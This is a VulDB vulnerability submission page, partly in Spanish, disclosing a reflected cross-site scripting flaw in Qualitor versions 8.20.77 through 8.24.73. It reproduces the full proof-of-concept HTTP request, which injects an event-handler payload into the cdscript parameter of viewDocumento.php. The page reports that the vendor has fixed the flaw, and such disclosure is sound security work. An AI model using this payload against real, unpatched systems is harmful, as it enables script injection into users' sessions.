Enviar #705193: Qualitor 8.20.77 - 8.24.73 Cross Site Scriptinginformación

TítuloQualitor 8.20.77 - 8.24.73 Cross Site Scripting
DescripciónThe vulnerability was reported to the vendor, who made the fixes and released new versions. I identified a cross-site scripting vulnerability in the call parameter: GET /Qualitor/html/bc/bcdocumento9/biblioteca/request/viewDocumento.php?cdscript=145"/>%20<p+oncontentvisibilityautostatechange="alert(/chor4o/)"%20style="content-visibility:auto&cddocumento=644 HTTP/2 Host: teste.teste.com.br Cookie: deleted, generate a new one User agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0 Accept: text/html,application/xhtml+xml,application/xml;q=0,9,*/*;q=0,8 Acceptance language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i Te: trailers
Fuente⚠️ https://www.qualitor.com.br/
Usuario
 chor4o (UID 52584)
Sumisión2025-12-02 16:32 (hace 4 meses)
Moderación2025-12-12 15:46 (10 days later)
EstadoAceptado
Entrada de VulDB336201 [Qualitor hasta 8.24.73 viewDocumento.php cdscript secuencias de comandos en sitios cruzados]
Puntos17

AnteriorVisión De ConjuntoPróximo

Might our Artificial Intelligence support you?

Check our Alexa App!